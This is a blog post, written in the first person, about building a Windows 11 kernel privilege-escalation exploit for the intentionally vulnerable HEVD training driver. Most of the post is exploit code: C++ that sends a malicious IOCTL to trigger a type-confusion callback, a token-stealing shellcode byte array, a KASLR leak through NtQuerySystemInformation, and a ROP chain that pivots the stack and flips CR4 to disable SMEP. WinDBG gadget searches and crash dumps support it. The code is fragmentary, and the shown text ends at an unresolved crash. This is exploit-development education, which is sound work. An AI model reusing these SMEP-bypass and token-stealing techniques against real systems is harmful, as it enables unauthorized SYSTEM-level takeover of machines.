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How a simple K-TypeConfusion took me 3 months long to create a exploit?

6 August 2023 at 13:10

How a simple K-TypeConfusion took me 3 months long to create a exploit? [HEVD] - Windows 11 (build 22621)

Have you ever tested something for a really long time, that it made part of your life? that’s what happen to me for the last months when a simple TypeConfusionvulnerability almost made me go crazy!


In this blogpost, we will talk about my experience covering a simple vulnerability that for some reason was the most hard and confuse thing that i ever have seen in a context of Kernel Exploitaiton.

We will cover about the follow topics:

  • TypeConfusion: We will discuss how this vulnerability impact in windows kernel, and as a researcher how we can manipulate and implement an exploit from User-Landin order to get Privileged Access on the operation system.
  • ROPchain: Method to make RIPregister jump through windows kernel addresses, in order to execute code. With this technique, we can actually manipulate the order of execution of our Stack, and thenceforth get access into the User-Land Shellcode.
  • Kernel ASLR Bypass: Way to Leakkernel memory addresses, and with the correct base address, we’re able to calculatethe memory region which we want to use posteriorly.
  • Supervisor Mode Execution Prevention (SMEP): Basically a mechanism that block all execution from user-land addresses, if it is enabled in operation system, you can’t JMP/CALLinto User-Land, so you can’t simply direct execute your shellcode. This protection come since Windows 8.0 (32/64 bits) version.
  • Kernel Memory Managment: Important informations about how Kernel interprets memory, including: Memory Paging, Segmentations,Data Transfer, etc. Also, a description of how memory uses his data during Operation System Layout.
  • Stack Manipulation: Stack is the most notorious thing that you will see in this blogpost, all my research lies on it, and after reboot myVM million times, i actually can understand a little bit some concepts that you must consider when writing a Stack Based exploit.

VM Setup

OS Name:                   Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Vulnerable Driver: HackSysExtremeVulnerableDriver a.k.a HEVD.sys

Tips for Kernel Exploitation coding

Default windows functions most of the time can delay a exploitation development, because most of these functions should have “protected values” with a view to preveting misuse from attackers or people who want to modify/manipulateinternal values. According many C/C++scripts, you can find a import as follows:

#include <windows.h>
#include <winternl.h> // Don't use it
#include <iostream>
#pragma comment(lib, "ntdll.lib")

When a inclusion of winternl.h file is made, default values of “innumerous” functions are overwritten with the values defined on structson the library.

// snippet from wine/include/winternl.h
SystemBasicInformation = 0,
SystemCpuInformation = 1,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
SystemPathInformation = 4,
SystemProcessInformation = 5,
SystemCallCountInformation = 6,
SystemDeviceInformation = 7,

The problem is, when you manipulating and exploiting functions from User-Land like NtQuerySystemInformationin “recent” windows versions, these defined values are “different”, blocking and preveting the use of it functions which can have some ability to leak kernel base addresses, consequently delaying our exploitation phase. So, it’s import to make sure that a code is crafted by ignoring winternl.h and posteriorly by utilizing manually structs definitions as example below:

#include <iostream>
#include <windows.h>
#include <ntstatus.h>
#include <string>
#include <Psapi.h>
#include <vector>

#define QWORD uint64_t

SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45

HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];

ULONG NumberOfModules;

typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength

// Function pointer typedef for NtDeviceIoControlFile
typedef NTSTATUS(WINAPI* LPFN_NtDeviceIoControlFile)(
HANDLE FileHandle,
PVOID ApcRoutine,
PVOID ApcContext,
PVOID IoStatusBlock,
ULONG IoControlCode,
PVOID InputBuffer,
ULONG InputBufferLength,
PVOID OutputBuffer,
ULONG OutputBufferLength

// Loads NTDLL library
HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile function
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

INT64 GetKernelBase() {
// Leak NTDLL.sys base address in order to KASLR bypass
DWORD len;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!ModuleInfo) {
return NULL;
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;

With this technique, now we’re able to use all correct structsvalues without any troubles.

TypeConfusion vulnerability

Utilizing IDA Reverse Engineering Tool, we can clearly see the correct IOCTLwhich execute our vulnerable function.

0x222023 IOCTL to execute our TypeConfusionIoctlHandler

After reversing TriggerTypeConfusion, we have the follow code:

// IDA Pseudo-code into TriggerTypeConfusion function
__int64 __fastcall TriggerTypeConfusion(_USER_TYPE_CONFUSION_OBJECT *a1)
unsigned int v4; // ebx
ProbeForRead(a1, 0x10ui64, 1u);
PoolWithTag = (_KERNEL_TYPE_CONFUSION_OBJECT *)ExAllocatePoolWithTag(NonPagedPool, 0x10ui64, 0x6B636148u);
if ( PoolWithTag )
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%X\n", 16i64);
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] UserTypeConfusionObject: 0x%p\n", a1);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject: 0x%p\n", PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject Size: 0x%X\n", 16i64);
PoolWithTag->ObjectID = a1->ObjectID; // USER_CONTROLLED PARAMETER
PoolWithTag->ObjectType = a1->ObjectType; // USER_CONTROLLED PARAMETER
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectID: 0x%p\n", (const void *)PoolWithTag->ObjectID);
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->ObjectType: 0x%p\n", PoolWithTag->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Triggering Type Confusion\n");
v4 = TypeConfusionObjectInitializer(PoolWithTag);
DbgPrintEx(0x4Du, 3u, "[+] Freeing KernelTypeConfusionObject Object\n");
DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
ExFreePoolWithTag(PoolWithTag, 0x6B636148u);
return v4;
DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
return 3221225495i64;

As you can see, the function is expecting two values from a user-controlled struct named _KERNEL_TYPE_CONFUSION_OBJECT, this struct contains (ObjectID, ObjectType)as parameters, and after parse these objects, it utilizes TypeConfusionObjectInitializerwith our objects. The vulnerable code follows as bellow:

__int64 __fastcall TypeConfusionObjectInitializer(_KERNEL_TYPE_CONFUSION_OBJECT *KernelTypeConfusionObject)
DbgPrintEx(0x4Du, 3u, "[+] KernelTypeConfusionObject->Callback: 0x%p\n", KernelTypeConfusionObject->Callback);
DbgPrintEx(0x4Du, 3u, "[+] Calling Callback\n");
((void (*)(void))KernelTypeConfusionObject->ObjectType)(); // VULNERABLE
DbgPrintEx(0x4Du, 3u, "[+] Kernel Type Confusion Object Initialized\n");
return 0i64;

The vulnerability in the code above is implict behind the unrestricted execution of _KERNEL_TYPE_CONFUSION_OBJECT->ObjectTypewhich pointer to an user-controlled address.

Exploit Initialization

Knowing about our vulnerability, now we’ll get focused into exploit phases.

First of all, we craft our code in order to communicate to our HEVDdriver IRPutilizing previously got IOCTL -> 0x22202, and after that send our malicious buffer.

// ---> Malicious Struct <---
INT64 ObjectID;
INT64 ObjectType;

HMODULE ntdll = LoadLibraryA("ntdll.dll");
// Get the address of NtDeviceIoControlFile
LPFN_NtDeviceIoControlFile NtDeviceIoControlFile = reinterpret_cast<LPFN_NtDeviceIoControlFile>(
GetProcAddress(ntdll, "NtDeviceIoControlFile"));

HANDLE setupSocket() {
// Open a handle to the target device
HANDLE deviceHandle = CreateFileA(
if (deviceHandle == INVALID_HANDLE_VALUE) {
//std::cout << "[-] Failed to open the device" << std::endl;
return FALSE;
return deviceHandle;
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = 0xDEADBEEFDEADBEEF; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
return 0;

int main() {
return 0;

Then after we send our buffer, _KERNEL_TYPE_CONFUSION_OBJECTshould be like this.

0xdeadbeefdeadbeef address is our callback for the moment
[CALL]ing 0xdeadbeefdeadbeef

Now we can cleary understand where exactly this vulnerability lies. The next step should be to JMP into our user-controlled buffer containing some shellcode that can escalate SYSTEM PRIVILEGES, the issue with this idea lies behind a protection mechanism called SMEP. Supervisor Mode Execution Prevention, a.k.a (SMEP).

Supervisor Mode Execution Prevention (SMEP)

The main idea behind SMEPprotection is to preveting CALL/JMP into user-landaddresses. If SMEPkernel bitis set to [1], it provides a security mechanism that protectmemory pages from user attacks.

According to Core Security,

SMEP: Supervisor Mode Execution Prevention allows pages to
be protected from
supervisor-mode instruction fetches. If
SMEP = 1, software operating in supervisor mode cannot
fetch instructions from linear addresses that are accessible in
user mode
- Detects RING-0 code running in USER SPACE
- Introduced at
Intel processors based on the Ivy Bridge architecture
- Security feature launched in 2011
- Enabled by default since
Windows 8.0 (32/64 bits)
- Kernel exploit mitigation
- Specially
"Local Privilege Escalation” exploits
must now consider this feature.

Then let’s see in a pratical test if it is actually working properly.

int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)shellcode; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
return 0;

After exploit execution we got something like this:

SMEP seems to be working properly

The BugCheckanalysis should be similar as a follows:

An attempt was made to execute non-executable memory. The guilty driver
is on the stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name is printed on
the BugCheck screen and saved in KiBugCheckDriver.
Arg1: 0000000080000000, Virtual address for the attempted execute.
Arg2: 00000001db4ea867, PTE contents.
Arg3: ffffb40672892490, (reserved)
Arg4: 0000000080000005, (reserved)

As we can see, SMEPprotection looks working right, the follow steps will cover how do we can manipulate our addresses in order to enable our shellcode buffer to be executed by processor.

Returned-Oriented-Programming against SMEP

Returned-Oriented-Programminga.k.a (ROP), is technique that allows any attacker to manipulate the instruction pointers and returned addresses in the current stack, with this type of attack, we can actually perform a programming assembly only with execution between address to address.

As CTF101 mentioned:

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
As we saw in buffer overflows, having stack control can be very powerful since it allows us to overwritesaved instruction pointers, giving us control over what the program does next. Most programs don’t have a convenient give_shell function however, so we need to find a way to manually invoke system or another exec function to get us our shell.

The main idea for our exploit lies behind the utilization of a ROP chain with a view to achieve arbitrary code execution. But how?

x64 CR4 register

As part of a Control Registers, CR4register basically holds a bit value that can changes between Operation Systems.

When SMEPis implemented, a default value is used in the current OS to check if SMEP still enabled, and with this information kernel can knows if through his execution, should be possible or not to CALL/JMPinto user-land addresses.

As Wikipedia says:

A control register is a processor register that changes or controls the general behavior of a CPU or other digital device. Common tasks performed by control registers include interrupt control, switching the addressing mode, paging control, and coprocessor control.
Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.

In my Operation System Build Windows 11 22621we can cleary see this register value in WinDBG:

CR4 value before ROP Chain

At now, the main idea is about to flipthe correct bit, in order to neutralize SMEP execution, and after that JMPinto attacker shellcode.

SMEP turning off through bit flip: 001[1]0101 -> 001[0]0101

Now, with this in mind, we need get back into our exploit source-code, and craft our ROP chainto achieve our goal. The question is, how?

At now, we know that we need change CR4value and a ROP chaincan help us, also we actually need at first to bypass Kernel ASLRdue the randomization between addresses in this land. The follow steps we’ll cover how to get the correct gadgetsto follow attacks.

Virtualization-based security (VBS)

With CR4register manipulation through ROP chainattacks, it’s important to notice that when a miscalculation is done by an attacker in the bit change exploit phase,if Virtualization-based securitybit is enabled, system catch exception and crashes after a change attempt of CR4 register value.

According to Microsoft:

Virtualization-based security (VBS) enhancements provide another layer of protection against attempts to execute malicious code in the kernel. For example, Device Guard blocks code execution in a non-signed area in kernel memory, including kernel EoP code. Enhancements in Device Guard also protect key MSRs, control registers, and descriptor table registers. Unauthorized modifications of the CR4 control register bitfields, including the SMEPfield, are blocked instantly.

If for some reason, you see an error as below, it’s a probably miscalculation of a the value which should be placed into CR4register.

// A example of miscalculation of CR4 address
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0xFFFFFF; // ---> WRONG CR4 value
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE

WinDBG output:

A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arg1: 0000000000000004, The thread's stack pointer was outside the legal stack
extents for the thread.

Arg2: 0000000047fff230, Address of the trap frame for the exception that caused the BugCheck
Arg3: 0000000047fff188, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
EXCEPTION_RECORD: 0000000047fff188 -- (.exr 0x47fff188)
ExceptionAddress: fffff80631091b99 (nt!RtlpGetStackLimitsEx+0x0000000000165f29)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000004
PROCESS_NAME: TypeConfusionWin11x64.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system has detected a stack-based buffer overrun in this application. It is possible that this saturation could allow a malicious user to gain control of the application.
EXCEPTION_PARAMETER1: 0000000000000004
EXCEPTION_STR: 0xc0000409

KASLR Bypass with NtQuerySystemInformation

NtQuerySystemInformationAs mentioned before, is a function that if configured correctly can leak kernel lib base addresses once perform system query operations. As return of these queries, we can actually leak memory from user-land.

As mentioned by TrustedWave:

The function NTQuerySystemInformation is implemented on NTDLL. And as a kernel API, it is always being updated during the Windows versions with no short notice. As mentioned, this is a private function, so not officially documented by Microsoft. It has been used since early days from Windows NT-family systems with different syscall IDs.
The function basically retrieves specific information from the environment and its structure is very simple
There are numerous data that can be retrieved using these classes along with the function. Information regarding the system, the processes, objects and others.

So, now we have a question, if we can leakaddresses and calculate the correct offset of the base of these addresses to our gadget, how can we search in memory for these ones?

The solution is simple as follows:

1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt

With the file ROP.txt, we have addresses but we’re still “unable” to get the correct ones to implement a valid calculation.

Ntdllfor exemple, utilizes addresses from his module as “buffers” sometimes, and the data can point for another invalid one. At kernel level, functions “changes”, and between all these “changes” you will never hit the correct offset through a simple .writememdump.

The biggest issue lies behind when a .writemem is used, it dumps the start and end of a defined module, but it automatically don’t align correctly the offset of functions. It happens due module segmentsand malleable data which can change time by time for the properly OS work . For example, if we search for opcodesutilizing WinDBGcommand line, there’s a static buffer address which returns exatcly the opcodes that we send.

WinDBG opcode searching

The addresses above seems to be valid, and they are identical due our opcodes, the problem is that 0xffffff80051ef8500 is a buffer and it returns everything we put into WinDBGsearch function [s command]. So, no matter how you changesopcode, it always returns back in a buffer.

WinDBG opcode searching

Ok, now let’s say that return as the follow output:

--> 0xfffff800516a6ac4 : pop r12 ; pop rbx ; pop rbp ; pop rdi ; pop rsi ; ret
0xfffff800514cbd9a : pop r12 ; pop rbx ; pop rbp ; ret
0xfffff800514d2bbf : pop r12 ; pop rbx ; ret
0xfffff800514b2793 : pop r12 ; pop rcx ; ret

If we try to check if that opcodesare the same in our current VM, we’ll notice something like this:

Inspecting 0xfffff800516a6ac4 address

As you can see, the offset from .writememis invalid, meaning that something went wrong. A simple fix for this issue is by looking into our ROPGadgetsand see what assembly code that we need, and thenceforth we convert this code into opcode, so with that we can freely search into current valid memory the addresses to start our ROP chain.

4 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
5 - kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
6 - kd> u nt!ExfReleasePushLock+0x20
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
7 - kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0

Now we know that ntdll base address 0xffffff8005120000 + 0x00000000002ce4c0will result into nt!ExfReleasePushLock+0x20function.

Stack Pivoting & ROP chain

With previously idea of what exatcly means aROP chain, now it’s important to know what gadget do we need to change CR4register value utlizing only kernel addresses.

mov esp, 0x48000000

POP RCX; ret // Just "pop" our RCX register to receive values
<CR4 CALCULATED VALUE> // Calculated value of current OS CR4 value
MOV CR4, RCX; ret // Changes current CR4 value with a manipulated one

// The logic for the ROP chain
// 1 - Allocate memory in 0x48000000 region
// 2 - When we moves 0x48000000 address to our ESP/RSP register
we actually can manipulated the range of addresses that we'll [CALL/JMP].

Now knowing about ourROP chain logic, we need to discuss about Stack Pivoting technique.

Stack pivoting basically means the changes of current Kernel stack into a user-controlled Fake Stack, this modification can be possible by changing RSP register value. When we changes RSP value to a user-controlled stack, we can actually manipulate it execution through a ROP chain, once we can do a programming returning into kernel addresses.

Getting back into the code, we implement our attacker Fake Stack.

INT64 ObjectID;
INT64 ObjectType;
typedef struct _SMEP {
// Leak base address utilizing NtQuerySystemInformation
INT64 GetKernelBase() {
DWORD len;
PVOID kernelBase = NULL;
_NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL) {
return NULL;
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
if (!ModuleInfo) {
return NULL;
NtQuerySystemInformation(SystemModuleInformation, ModuleInfo, len, &len);
kernelBase = ModuleInfo->Module[0].ImageBase;
VirtualFree(ModuleInfo, 0, MEM_RELEASE);
return (INT64)kernelBase;
SMEP SMEPBypass = { 0 };
int SMEPBypassInitializer() {
INT64 NT_BASE_ADDR = GetKernelBase(); // ntoskrnl.exe
std::cout << std::endl << "[+] NT_BASE_ADDR: 0x" << std::hex << NT_BASE_ADDR << std::endl;
INT64 STACK_PIVOT = NT_BASE_ADDR + 0x002ce4c0;
std::cout << "[+] STACK_PIVOT: 0x" << std::hex << STACK_PIVOT << std::endl;
1 - kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
2 - .writemem "C:/MyDump.dmp" fffff80051200000 fffff80052247000
3 - python3 .\ --binary C:\MyDump.dmp --ropchain --only "mov|pop|add|sub|xor|ret" > rop.txt
kd> lm m nt
Browse full module list
start end module name
fffff800`51200000 fffff800`52247000 nt (export symbols) ntkrnlmp.exe
kd> s fffff800`51200000 L?01047000 BC 00 00 00 48 83 C4 28 C3
fffff800`514ce4c0 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
fffff800`51ef8500 bc 00 00 00 48 83 c4 28-c3 01 a8 02 75 06 48 83 ....H..(....u.H.
fffff800`51ef8520 bc 00 00 00 48 83 c4 28-c3 cc cc cc cc cc cc cc ....H..(........
kd> u nt!ExfReleasePushLock+0x20
fffff800`514ce4c0 bc00000048 mov esp,48000000h
fffff800`514ce4c5 83c428 add esp,28h
fffff800`514ce4c8 c3 ret
kd> ? fffff800`514ce4c0 - fffff800`51200000
Evaluate expression: 2942144 = 00000000`002ce4c0
INT64 POP_RCX = NT_BASE_ADDR + 0x0021d795;
std::cout << "[+] POP_RCX: 0x" << std::hex << POP_RCX << std::endl;
kd> s fffff800`51200000 L?01047000 41 5C 59 C3
fffff800`5141d793 41 5c 59 c3 cc b1 02 e8-21 06 06 00 eb c1 cc cc A\Y.....!.......
fffff800`5141f128 41 5c 59 c3 cc cc cc cc-cc cc cc cc cc cc cc cc A\Y.............
fffff800`5155a604 41 5c 59 c3 cc cc cc cc-cc cc cc cc 48 8b c4 48 A\Y.........H..H
kd> u fffff800`5141d795
fffff800`5141d795 59 pop rcx
fffff800`5141d796 c3 ret
kd> ? fffff800`5141d795 - fffff800`51200000
Evaluate expression: 2217877 = 00000000`0021d795
INT64 MOV_CR4_RDX = NT_BASE_ADDR + 0x003a5fc7;
std::cout << "[+] MOV_CR4_RDX: 0x" << std::hex << POP_RCX << std::endl << std::endl;
kd> u nt!KeFlushCurrentTbImmediately+0x17
fffff800`515a5fc7 0f22e1 mov cr4,rcx
fffff800`515a5fca c3 ret
kd> ? fffff800`515a5fc7 - fffff800`51200000
Evaluate expression: 3825607 = 00000000`003a5fc7
return TRUE;
int exploit() {
HANDLE sock = setupSocket();
ULONG outBuffer = { 0 };
PVOID ioStatusBlock = { 0 };
BYTE sc[256] = {
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
return 0;

int main() {
return 0;

After exploit executes, we have the follow WinDBGoutput:

[CALL] pre-calculated addresses, in order to change current RSP value for 0x48000000 (user-controlled)
Segmentation Fault poped out after mov esp, 0x48000000 execution
Analysis of the segmentation fault error

